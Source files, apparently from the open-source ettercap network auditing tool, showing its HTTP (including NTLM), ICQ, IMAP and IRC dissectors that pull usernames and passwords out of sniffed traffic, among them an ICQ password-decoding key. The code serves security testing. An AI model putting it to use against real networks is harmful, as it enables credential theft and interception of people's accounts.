both Proxy and WWW Auth */ static int Parse_NTLM_Auth(char *ptr, char *from_here, struct packet_object *po) { char *to_decode, msgType, *tok; tSmbStdHeader *hSmb; int Proxy_Auth = 0; void *ident = NULL; struct ec_session *s = NULL; struct http_status *conn_status; DEBUG_MSG("HTTP --> dissector http (NTLM Auth)"); /* If it's a proxy auth and we are not interested on proxy stuff * return 0, so the dissector will continue to parse GET and POST */ /* It stands for both Proxy-Authenticate and Authorization ;) */ if (strstr(ptr, "Proxy-Auth") || strstr(ptr, "Proxy-auth")) { if (FROM_CLIENT("proxy", po) || FROM_SERVER("proxy", po)) Proxy_Auth = 1; else return 0; } if (!(to_decode = strdup(from_here))) return 1; ec_strtok(to_decode, "\r", &tok); char *decoded; base64decode(to_decode, &decoded); hSmb = (tSmbStdHeader *) decoded; msgType = IVAL(&hSmb->msgType, 0); /* msgType 2 -> Server challenge * msgType 3 -> Client response */ if (msgType==2) { tSmbNtlmAuthChallenge *challenge_struct; challenge_struct = (tSmbNtlmAuthChallenge *) decoded; /* Create a session to remember the server challenge */ dissect_create_session(&s, po, DISSECT_CODE(dissector_http)); SAFE_CALLOC(s->data, 1, sizeof(struct http_status)); conn_status = (struct http_status *) s->data; conn_status->c_status = NTLM_WAIT_RESPONSE; dumpRaw((char*)conn_status->c_data, challenge_struct->challengeData, 8); session_put(s); } else if (msgType==3) { tSmbNtlmAuthResponse *response_struct; char *outstr; /* Take the challenge from the session */ dissect_create_ident(&ident, po, DISSECT_CODE(dissector_http)); if (session_get_and_del(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) { conn_status = (struct http_status *) s->data; /* Are we waiting for client response? */ /* XXX- POST Continuation may conflict with NTLM Proxy auth * if the client doesn't send Proxy-Authorization in the same * packet as the POST */ if (conn_status->c_status == NTLM_WAIT_RESPONSE) { /* Fill the user and passwords */ response_struct = (tSmbNtlmAuthResponse *) decoded; po->DISSECTOR.user = strdup(GetUnicodeString(response_struct, uUser)); SAFE_CALLOC(po->DISSECTOR.pass, strlen(po->DISSECTOR.user) + 150, sizeof(char)); snprintf(po->DISSECTOR.pass, strlen(po->DISSECTOR.user) + 150, "(NTLM) %s:\"\":\"\":", po->DISSECTOR.user); outstr = po->DISSECTOR.pass + strlen(po->DISSECTOR.pass); dumpRaw(outstr,((unsigned char*)response_struct)+IVAL(&response_struct->lmResponse.offset,0), 24); outstr[48] = ':'; outstr+=49; dumpRaw(outstr,((unsigned char*)response_struct)+IVAL(&response_struct->ntResponse.offset,0), 24); outstr[48] = ':'; outstr += 49; strcat(po->DISSECTOR.pass, (const char*)conn_status->c_data); /* Are we authenticating to the proxy or to a website? */ if (Proxy_Auth) po->DISSECTOR.info = strdup("Proxy Authentication"); else Find_Url(ptr, &(po->DISSECTOR.info)); Print_Pass(po); } session_free(s); } SAFE_FREE(ident); } SAFE_FREE(to_decode); SAFE_FREE(decoded); return 1; } /* Deal with POST continuation */ static void Parse_Post_Payload(char *ptr, struct http_status *conn_status, struct packet_object *po) { char *user=NULL, *pass=NULL; u_char user_res, pass_res; DEBUG_MSG("HTTP - Parse First chance"); if (conn_status->c_status == POST_WAIT_DELIMITER) if ((ptr = strstr(ptr, "\r\n\r\n"))) { ptr+=4; conn_status->c_status = POST_LAST_CHANCE; } DEBUG_MSG("HTTP - Parse Last chance"); if (conn_status->c_status == POST_LAST_CHANCE) { DEBUG_MSG("HTTP - Parse Form"); user_res= Parse_Form(ptr, &user, USER); pass_res= Parse_Form(ptr, &pass, PASS); if (user_res || pass_res) { po->DISSECTOR.user = user; po->DISSECTOR.pass = pass; po->DISSECTOR.content = strdup((const char*) ptr); po->DISSECTOR.info = strdup((const char*)conn_status->c_data); dissect_wipe_session(po, DISSECT_CODE(dissector_http)); Print_Pass(po); } else { SAFE_FREE(user); SAFE_FREE(pass); } } } /* Parse the POST header */ static void Parse_Method_Post(char *ptr, struct packet_object *po) { char *url = NULL; struct ec_session *s = NULL; struct http_status *conn_status; DEBUG_MSG("HTTP --> dissector http (method POST)"); Find_Url_Referer(ptr, &url); /* We create a session just in case the post was * fragmented into more packets. The session will be * wiped on HTTP server reply. */ dissect_create_session(&s, po, DISSECT_CODE(dissector_http)); SAFE_CALLOC(s->data, 1, sizeof(struct http_status)); conn_status = (struct http_status *) s->data; conn_status->c_status = POST_WAIT_DELIMITER; strlcpy((char*)conn_status->c_data, url, sizeof(conn_status->c_data)); session_put(s); Parse_Post_Payload(ptr, conn_status, po); SAFE_FREE(url); } /* Search for passwords in the URL */ static void Parse_Method_Get(char *ptr, struct packet_object *po) { char *to_parse = NULL; char *delimiter = NULL; char *user = NULL; char *pass = NULL; DEBUG_MSG("HTTP --> dissector http (method GET)"); /* Isolate the parameters and copy them into another string */ if (!(to_parse = strstr(ptr, "?"))) return; if (!(to_parse = strdup(to_parse))) return; if (!(delimiter = strstr(to_parse, " HTTP"))) goto http_get_failure; /* NULL terminate the newly created parameter string */ *delimiter = 0; /* Let's parse the parameter list */ if (!Parse_Form(to_parse, &user, USER) || !Parse_Form(to_parse, &pass, PASS)) { SAFE_FREE(user); goto http_get_failure; } po->DISSECTOR.user = user; po->DISSECTOR.pass = pass; /* Fill the info with the URL */ Find_Url_Referer(ptr, &(po->DISSECTOR.info)); Print_Pass(po); http_get_failure: SAFE_FREE(to_parse); } /* Match users or passwords in a string */ static u_char Parse_Form(char *to_parse, char **ret, int mode) { char *q; struct http_field_entry *d; /* Strip the '?' from a GET method */ if (*to_parse == '?') to_parse++; if (*to_parse == 0) return 0; /* Search for users or passwords */ /* Search matches between each parameter and * recognized users and passwords */ SLIST_FOREACH(d, &(http_fields[mode]), next) { q = to_parse; do { if (*q == '&') q++; if (!strncasecmp(q, d->name, strlen(d->name)) && *(q+strlen(d->name)) == '=' ) { /* Return the value past the '=' */ if (!(*ret = strdup(q + strlen(d->name) + 1))) return 0; /* NULL terminate the value if it's not the last */ if ((q = strchr(*ret, '&'))) *q = 0; Decode_Url(*ret); return 1; } } while ( (q = strchr(q, '&')) ); } return 0; } /* Unescape the string */ static void Decode_Url(char *src) { char t[3]; u_int32 i, j, ch; /* Paranoid test */ if (!src) return; /* NULL terminate for the strtoul */ t[2] = 0; for (i=0, j=0; src[i] != 0; i++, j++) { ch = (u_int32)src[i]; if (ch == '%' && isxdigit((u_int32)src[i + 1]) && isxdigit((u_int32)src[i + 2])) { memcpy(t, src+i+1, 2); ch = strtoul(t, NULL, 16); i += 2; } src[j] = (char)ch; } src[j] = 0; } /* Gets the URL from the headers */ static void Find_Url_Referer(char *to_parse, char **ret) { char *fromhere, *page=NULL, *host=NULL; u_int32 len; char *tok; /* If the referer exists */ if ((fromhere = strstr(to_parse, "Referer: "))) { if ((*ret = strdup(fromhere + strlen("Referer: ")))) ec_strtok(*ret, "\r", &tok); } else { /* Get the page from the request */ page = strdup(to_parse); ec_strtok(page, " HTTP", &tok); /* If the path is relative, search for the Host */ if ((*page=='/') && (fromhere = strstr(to_parse, "Host: "))) { host = strdup( fromhere + strlen("Host: ") ); ec_strtok(host, "\r", &tok); } else host = strdup(""); len = strlen(page) + strlen(host) + 2; SAFE_CALLOC(*ret, len, sizeof(char)); snprintf(*ret, len, "%s%s", host, page); SAFE_FREE(page); SAFE_FREE(host); } Decode_Url(*ret); } /* Gets the URL from the request */ static void Find_Url(char *to_parse, char **ret) { char *fromhere, *page=NULL, *host=NULL; u_int32 len; char *tok; if (!strncmp(to_parse, "GET ", 4)) to_parse += strlen("GET "); else if (!strncmp(to_parse, "POST ", 5)) to_parse += strlen("POST "); else return; /* Get the page from the request */ page = strdup(to_parse); ec_strtok(page, " HTTP", &tok); /* If the path is relative, search for the Host */ if ((*page=='/') && (fromhere = strstr(to_parse, "Host: "))) { host = strdup( fromhere + strlen("Host: ") ); ec_strtok(host, "\r", &tok); } else host = strdup(""); len = strlen(page) + strlen(host) + 2; SAFE_CALLOC(*ret, len, sizeof(char)); snprintf(*ret, len, "%s%s", host, page); SAFE_FREE(page); SAFE_FREE(host); Decode_Url(*ret); } /* Print the passwords from the PO */ static void Print_Pass(struct packet_object *po) { char tmp[MAX_ASCII_ADDR_LEN]; if (!po->DISSECTOR.user) po->DISSECTOR.user = strdup(""); if (!po->DISSECTOR.pass) po->DISSECTOR.pass = strdup(""); DISSECT_MSG("HTTP : %s:%d -> USER: %s PASS: %s INFO: %s\n", ip_addr_ntoa(&po->L3.dst, tmp), ntohs(po->L4.dst), po->DISSECTOR.user, po->DISSECTOR.pass, po->DISSECTOR.info); if (po->DISSECTOR.content) DISSECT_MSG("CONTENT: %s\n\n", po->DISSECTOR.content); } /* Load known user/pass fields from file */ int http_fields_init(void) { FILE *f; struct http_field_entry *d; char line[128]; char *ptr; int pass_flag = USER; /* open the file */ f = open_data("share", ETTER_FIELDS, FOPEN_READ_TEXT); if (f == NULL) { USER_MSG("Cannot open %s\n", ETTER_FIELDS); return -E_INVALID; } /* load it in the list */ while (fgets(line, 128, f)) { /* trim comments */ if ( (ptr = strchr(line, '#')) ) *ptr = 0; /* trim \n */ if ( (ptr = strchr(line, '\n')) ) *ptr = 0; /* trim ' ' */ if ( (ptr = strchr(line, ' ')) ) *ptr = 0; /* skip empty lines */ if (!strlen(line)) continue; /* Identify the section */ if(!strncmp(line, "[USER]", 6)) { pass_flag = USER; continue; } if(!strncmp(line, "[PASS]", 6)) { pass_flag = PASS; continue; } /* create the entry */ SAFE_CALLOC(d, 1, sizeof(struct http_field_entry)); d->name = strdup(line); /* insert in the right list */ SLIST_INSERT_HEAD(&(http_fields[pass_flag]), d, next); } fclose(f); return E_SUCCESS; } /* A little helper function */ static void dumpRaw(char *str, unsigned char *buf, size_t len) { u_int32 i; for (i=0; i #include #include #include /* globals */ struct tlv_hdr { u_int8 type[2]; #define TLV_LOGIN "\x00\x01" #define TLV_PASS "\x00\x02" u_int8 len[2]; }; struct flap_hdr { u_int8 cmd; u_int8 chan; #define FLAP_CHAN_LOGIN 1 u_int16 seq; u_int16 dlen; }; struct snac_hdr { u_int16 family; u_int16 subtype; u_int16 flags; u_char id[4]; }; /* protos */ FUNC_DECODER(dissector_icq); static void icq_init(void); static void decode_pwd(char *pwd, char *outpwd); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ static void __init icq_init(void) { dissect_add("icq", APP_LAYER_TCP, 5190, dissector_icq); dissect_add("icq", APP_LAYER_TCP, 5191, dissector_icq); dissect_add("icq", APP_LAYER_TCP, 5192, dissector_icq); dissect_add("icq", APP_LAYER_TCP, 5193, dissector_icq); } FUNC_DECODER(dissector_icq) { DECLARE_DISP_PTR_END(ptr, end); char tmp[MAX_ASCII_ADDR_LEN]; struct flap_hdr *fhdr; struct tlv_hdr *thdr; char *user, *pwdtemp; /* don't complain about unused var */ (void)end; (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* parse only version 7/8 */ if (ptr[0] != 0x2a || ptr[1] > 4) return NULL; /* skip empty packets (ACK packets) */ if (PACKET->DATA.len == 0) return NULL; /* skip messages coming from the server */ if (FROM_SERVER("icq", PACKET)) return NULL; DEBUG_MSG("ICQ --> TCP dissector_icq [%d.%d]", ptr[0], ptr[1]); /* we try to recognize the protocol */ fhdr = (struct flap_hdr *) ptr; /* login sequence */ if (fhdr->chan == FLAP_CHAN_LOGIN) { /* move the pointer */ ptr += sizeof(struct flap_hdr); thdr = (struct tlv_hdr *) ptr; /* we need server HELLO (0000 0001) */ if (memcmp(ptr, "\x00\x00\x00\x01", 4) ) return NULL; /* move the pointer */ thdr = thdr + 1; /* catch the login */ if (memcmp(thdr->type, TLV_LOGIN, sizeof(thdr->type))) return NULL; DEBUG_MSG("\tDissector_icq - LOGIN "); /* point to the user */ user = (char *)(thdr + 1); /* move the pointer */ thdr = (struct tlv_hdr *) ((char *)thdr + sizeof(struct tlv_hdr) + thdr->len[1]); DEBUG_MSG("\tdissector_icq : TLV TYPE [%d]", thdr->type[1]); /* catch the pass */ if (memcmp(thdr->type, TLV_PASS, sizeof(thdr->type))) return NULL; DEBUG_MSG("\tDissector_icq - PASS"); /* use a temp buff to decript the password */ pwdtemp = strdup((char *)(thdr + 1)); SAFE_CALLOC(PACKET->DISSECTOR.pass, strlen(pwdtemp) + 1, sizeof(char)); /* decode the password */ decode_pwd(pwdtemp, PACKET->DISSECTOR.pass); /* save the user */ PACKET->DISSECTOR.user = strdup(user); SAFE_FREE(pwdtemp); /* move the pointer */ thdr = (struct tlv_hdr *) ((char *)thdr + sizeof(struct tlv_hdr) + thdr->len[1]); PACKET->DISSECTOR.info = strdup((char *)(thdr + 1)); DISSECT_MSG("ICQ : %s:%d -> USER: %s PASS: %s \n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); } return NULL; } /* * decode the crypted password */ static void decode_pwd(char *pwd, char *outpwd) { size_t x, pwdlen; u_char pwd_key[] = { 0xF3, 0x26, 0x81, 0xC4, 0x39, 0x86, 0xDB, 0x92, 0x71, 0xA3, 0xB9, 0xE6, 0x53, 0x7A, 0x95, 0x7C }; pwdlen = strlen(pwd); for( x = 0; x < pwdlen; x++) *(outpwd + x) = pwd[x] ^ pwd_key[x]; return; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_imap.c000664 000000 000000 00000021561 13711276346 020201 0ustar00rootroot000000 000000 /* ettercap -- dissector IMAP -- TCP 143 220 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ /* * The authentication schema can be found here: * * ftp://ftp.rfc-editor.org/in-notes/rfc1730.txt * ftp://ftp.rfc-editor.org/in-notes/rfc1731.txt * * we currently support: * - LOGIN * - AUTHENTICATE LOGIN */ #include #include #include #include #include /* protos */ FUNC_DECODER(dissector_imap); void imap_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init imap_init(void) { dissect_add("imap", APP_LAYER_TCP, 143, dissector_imap); dissect_add("imap", APP_LAYER_TCP, 220, dissector_imap); sslw_dissect_add("imaps", 993, dissector_imap, SSL_ENABLED); } FUNC_DECODER(dissector_imap) { DECLARE_DISP_PTR_END(ptr, end); struct ec_session *s = NULL; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* the connection is starting... create the session */ CREATE_SESSION_ON_SYN_ACK("imap", s, dissector_imap); /* create the session even if we are into an ssl tunnel */ CREATE_SESSION_ON_SYN_ACK("imaps", s, dissector_imap); /* check if it is the first packet sent by the server */ IF_FIRST_PACKET_FROM_SERVER_SSL("smtp", "ssmtp", s, ident, dissector_imap) { DEBUG_MSG("\tdissector_imap BANNER"); /* * get the banner * "* OK banner" */ /* skip the number, go to response */ while(*ptr != ' ' && ptr != end) ptr++; /* reached the end */ if (ptr == end) return NULL; if (!strncmp((const char*)ptr, " OK ", 4)) { PACKET->DISSECTOR.banner = strdup((const char*)ptr + 3); /* remove the \r\n */ if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.banner, '\r')) != NULL ) *ptr = '\0'; } } ENDIF_FIRST_PACKET_FROM_SERVER(s, ident) /* skip messages coming from the server */ if (FROM_SERVER("imap", PACKET) || FROM_SERVER("imaps", PACKET)) return NULL; /* skip empty packets (ACK packets) */ if (PACKET->DATA.len == 0) return NULL; DEBUG_MSG("IMAP --> TCP dissector_imap"); /* skip the number, move to the command * if there is no space in the line, we are * probably already transferring credentials */ if (strchr((char*)ptr, ' ')) { while(*ptr != ' ' && ptr != end) ptr++; } /* reached the end */ if (ptr == end) return NULL; /* * LOGIN authentication: * * n LOGIN user pass */ if ( !strncasecmp((const char*)ptr, " LOGIN ", 7) ) { DEBUG_MSG("\tDissector_imap LOGIN"); ptr += 7; PACKET->DISSECTOR.user = strdup((const char*)ptr); /* split the string */ if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.user, ' ')) != NULL ) *ptr = '\0'; else { SAFE_FREE(PACKET->DISSECTOR.user); return NULL; } /* save the second part */ PACKET->DISSECTOR.pass = strdup((const char*)ptr + 1); if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\r')) != NULL ) *ptr = '\0'; /* print the message */ DISSECT_MSG("IMAP : %s:%d -> USER: %s PASS: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); return NULL; } /* * AUTHENTICATE LOGIN * * digest(user) * digest(pass) * * the digests are in base64 */ if ( !strncasecmp((const char*)ptr, " AUTHENTICATE LOGIN", 19) ) { DEBUG_MSG("\tDissector_imap AUTHENTICATE LOGIN"); /* destroy any previous session */ dissect_wipe_session(PACKET, DISSECT_CODE(dissector_imap)); /* create the new session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_imap)); /* remember the state (used later) */ s->data = strdup("AUTH"); /* save the session */ session_put(s); /* username is in the next packet */ return NULL; } /* * AUTHENTICATE PLAIN * * digest(authcid+\0+user+\0+pass) * * the digest is in base64 * * we ignore the authzid (authorization identity) for now */ if ( !strncasecmp((const char*)ptr, " AUTHENTICATE PLAIN", 19) ) { DEBUG_MSG("\tDissector_imap AUTHENTICATE PLAIN"); /* destroy any previous session */ dissect_wipe_session(PACKET, DISSECT_CODE(dissector_imap)); /* create the new session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_imap)); /* remember the state (used later) */ s->data = strdup("PLAIN"); /* save the session */ session_put(s); /* username is in the next packet */ return NULL; } /* search the session (if it exist) */ dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_imap)); if (session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { SAFE_FREE(ident); return NULL; } SAFE_FREE(ident); /* the session is invalid */ if (s->data == NULL) { dissect_wipe_session(PACKET, DISSECT_CODE(dissector_imap)); return NULL; } if (!strcmp(s->data, "AUTH")) { char *user; int i; DEBUG_MSG("\tDissector_imap AUTHENTICATE LOGIN USER"); /* username is encoded in base64 */ i = base64decode((const char*)ptr, &user); SAFE_FREE(s->data); /* store the username in the session */ SAFE_CALLOC(s->data, strlen("AUTH USER ") + i + 1, sizeof(char) ); snprintf(s->data, strlen("AUTH USER ") + i + 1, "AUTH USER %s", user); SAFE_FREE(user); /* pass is in the next packet */ return NULL; } if (!strncmp(s->data, "AUTH USER", 9)) { char *pass; DEBUG_MSG("\tDissector_imap AUTHENTICATE LOGIN PASS"); //SAFE_CALLOC(pass, strlen((const char*)ptr), sizeof(char)); /* password is encoded in base64 */ base64decode((const char *)ptr, &pass); /* fill the structure */ PACKET->DISSECTOR.user = strdup(s->data + strlen("AUTH USER ")); PACKET->DISSECTOR.pass = strdup(pass); SAFE_FREE(pass); /* destroy the session */ dissect_wipe_session(PACKET, DISSECT_CODE(dissector_imap)); /* print the message */ DISSECT_MSG("IMAP : %s:%d -> USER: %s PASS: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); return NULL; } if (!strcmp(s->data, "PLAIN")) { char *cred; char *cred_end; char *p; int i; DEBUG_MSG("\tDissector_imap AUTHENTICATE PLAIN USER/PASS"); /* password is encoded in base64 */ i = base64decode((const char *)ptr, &cred); p = cred; cred_end = cred+i; if (p > cred_end) { SAFE_FREE(cred); dissect_wipe_session(PACKET, DISSECT_CODE(dissector_imap)); return NULL; } /* move to the username right after the first \0 */ while(*p && p!=cred_end) p++; if (p!=cred_end) p++; /* fill the structure */ PACKET->DISSECTOR.user = strdup(p); /* now find the password right after the first \0 in cred */ while(*p && p!=cred_end) p++; if (p!=cred_end) p++; PACKET->DISSECTOR.pass = strdup(p); SAFE_FREE(cred); /* destroy the session */ dissect_wipe_session(PACKET, DISSECT_CODE(dissector_imap)); /* print the message */ DISSECT_MSG("IMAP : %s:%d -> USER: %s PASS: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); return NULL; } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_irc.c000664 000000 000000 00000026414 13711276346 020032 0ustar00rootroot000000 000000 /* ettercap -- dissector irc -- TCP 6665 6666 6667 6668 6669 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /* protos */ FUNC_DECODER(dissector_irc); void irc_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init irc_init(void) { dissect_add("irc", APP_LAYER_TCP, 6665, dissector_irc); dissect_add("irc", APP_LAYER_TCP, 6666, dissector_irc); dissect_add("irc", APP_LAYER_TCP, 6667, dissector_irc); dissect_add("irc", APP_LAYER_TCP, 6668, dissector_irc); dissect_add("irc", APP_LAYER_TCP, 6669, dissector_irc); sslw_dissect_add("ircs", 994, dissector_irc, SSL_ENABLED); } FUNC_DECODER(dissector_irc) { DECLARE_DISP_PTR_END(ptr, end); struct ec_session *s = NULL; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; /* unused variable */ (void)end; (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* skip messages coming from the server */ if (FROM_SERVER("irc", PACKET) || FROM_SERVER("ircs", PACKET)) return NULL; /* skip empty packets (ACK packets) */ if (PACKET->DATA.len == 0) return NULL; DEBUG_MSG("IRC --> TCP dissector_irc"); /* * authentication method: PASS * * /PASS password * */ if ( !strncasecmp((const char*)ptr, "PASS ", 5) ) { DEBUG_MSG("\tDissector_irc PASS"); ptr += 5; dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_irc)); /* get the saved nick */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) PACKET->DISSECTOR.user = strdup(s->data); else PACKET->DISSECTOR.user = strdup("unknown"); SAFE_FREE(ident); PACKET->DISSECTOR.pass = strdup((const char*)ptr); if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\r')) != NULL ) *ptr = '\0'; if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\n')) != NULL ) *ptr = '\0'; PACKET->DISSECTOR.info = strdup("/PASS password"); DISSECT_MSG("IRC : %s:%d -> USER: %s PASS: %s INFO: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass, PACKET->DISSECTOR.info); return NULL; } /* * changing a channel key * * /MODE #channel +k password * */ if ( !strncasecmp((const char*)ptr, "MODE ", 5) && match_pattern((const char*)ptr + 5, "#* +k *") ) { DEBUG_MSG("\tDissector_irc MODE"); ptr += 5; /* fill the structure */ PACKET->DISSECTOR.user = strdup((const char*)ptr); if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.user, ' ')) != NULL ) *ptr = '\0'; else { SAFE_FREE(PACKET->DISSECTOR.user); return NULL; } /* skip the " +k " */ PACKET->DISSECTOR.pass = strdup((const char*)ptr + 4); if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\r')) != NULL ) *ptr = '\0'; if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\n')) != NULL ) *ptr = '\0'; PACKET->DISSECTOR.info = strdup("/MODE #channel +k password"); DISSECT_MSG("IRC : %s:%d -> CHANNEL: %s PASS: %s INFO: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass, PACKET->DISSECTOR.info); return NULL; } /* * entering in a channel with a key * * /JOIN #channel password * */ if ( !strncasecmp((const char*)ptr, "JOIN ", 5) && match_pattern((const char*)ptr + 5, "#* *") ) { DEBUG_MSG("\tDissector_irc JOIN"); ptr += 5; /* fill the structure */ PACKET->DISSECTOR.user = strdup((const char*)ptr); if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.user, ' ')) != NULL ) *ptr = '\0'; else { SAFE_FREE(PACKET->DISSECTOR.user); return NULL; } PACKET->DISSECTOR.pass = strdup((const char*)ptr + 1); if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\r')) != NULL ) *ptr = '\0'; if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\n')) != NULL ) *ptr = '\0'; PACKET->DISSECTOR.info = strdup("/JOIN #channel password"); DISSECT_MSG("IRC : %s:%d -> CHANNEL: %s PASS: %s INFO: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass, PACKET->DISSECTOR.info); return NULL; } /* * identifying to the nickserv * * /msg nickserv identify password * */ if ( !strncasecmp((const char*)ptr, "PRIVMSG ", 8) && match_pattern((const char*)ptr + 8, "* :identify *\r\n") ) { char *pass; DEBUG_MSG("\tDissector_irc PRIVMSG"); if (!(pass = strcasestr((char*)ptr, "identify"))) return NULL; pass += 9; dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_irc)); /* get the saved nick */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) PACKET->DISSECTOR.user = strdup(s->data); else PACKET->DISSECTOR.user = strdup("unknown"); SAFE_FREE(ident); PACKET->DISSECTOR.pass = strdup(pass); if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\r')) != NULL ) *ptr = '\0'; if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\n')) != NULL ) *ptr = '\0'; PACKET->DISSECTOR.info = strdup("/msg nickserv identify password"); DISSECT_MSG("IRC : %s:%d -> USER: %s PASS: %s INFO: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass, PACKET->DISSECTOR.info); return NULL; } /* * identifying to the nickserv * * /nickserv identify password * */ if ( !strncasecmp((const char*)ptr, "NICKSERV ", 9) || !strncasecmp((const char*)ptr, "NS ", 3) ) { char *pass; DEBUG_MSG("\tDissector_irc NICKSERV"); if (!(pass = strcasestr((const char*)ptr, "identify"))) return NULL; pass += 9; dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_irc)); /* get the saved nick */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) PACKET->DISSECTOR.user = strdup(s->data); else PACKET->DISSECTOR.user = strdup("unknown"); SAFE_FREE(ident); PACKET->DISSECTOR.pass = strdup(pass); if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\r')) != NULL ) *ptr = '\0'; if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\n')) != NULL ) *ptr = '\0'; PACKET->DISSECTOR.info = strdup("/nickserv identify password"); DISSECT_MSG("IRC : %s:%d -> USER: %s PASS: %s INFO: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass, PACKET->DISSECTOR.info); return NULL; } /* * identifying to the nickserv * * /identify password * */ if ( !strncasecmp((const char*)ptr, "IDENTIFY ", 9) ) { char *pass; DEBUG_MSG("\tDissector_irc IDENTIFY"); if (!(pass = strcasestr((const char*)ptr, " "))) return NULL; /* adjust the pointer */ if (*++pass == ':') pass += 1; dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_irc)); /* get the saved nick */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) PACKET->DISSECTOR.user = strdup(s->data); else PACKET->DISSECTOR.user = strdup("unknown"); SAFE_FREE(ident); PACKET->DISSECTOR.pass = strdup(pass); if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\r')) != NULL ) *ptr = '\0'; if ( (ptr = (u_char*)strchr(PACKET->DISSECTOR.pass, '\n')) != NULL ) *ptr = '\0'; PACKET->DISSECTOR.info = strdup("/identify password"); DISSECT_MSG("IRC : %s:%d -> USER: %s PASS: %s INFO: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass, PACKET->DISSECTOR.info); return NULL; } /* * register the nick in the session * list, we need it later when printing * passwords. */ /* user is taking a nick */ if (!strncasecmp((const char*)ptr, "NICK ", 5)) { char *p; char *user; ptr += 5; if (*ptr == ':') ptr++; /* delete any previous saved nick */ dissect_wipe_session(PACKET, DISSECT_CODE(dissector_irc)); /* create the new session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_irc)); /* save the nick */ s->data = strdup((const char*)ptr); if ( (p = strchr(s->data, '\r')) != NULL ) *p = '\0'; if ( (p = strchr(s->data, '\n')) != NULL ) *p = '\0'; /* print the user info */ if ((ptr = (u_char*)strcasestr((const char*)ptr, "USER "))) { user = strdup((const 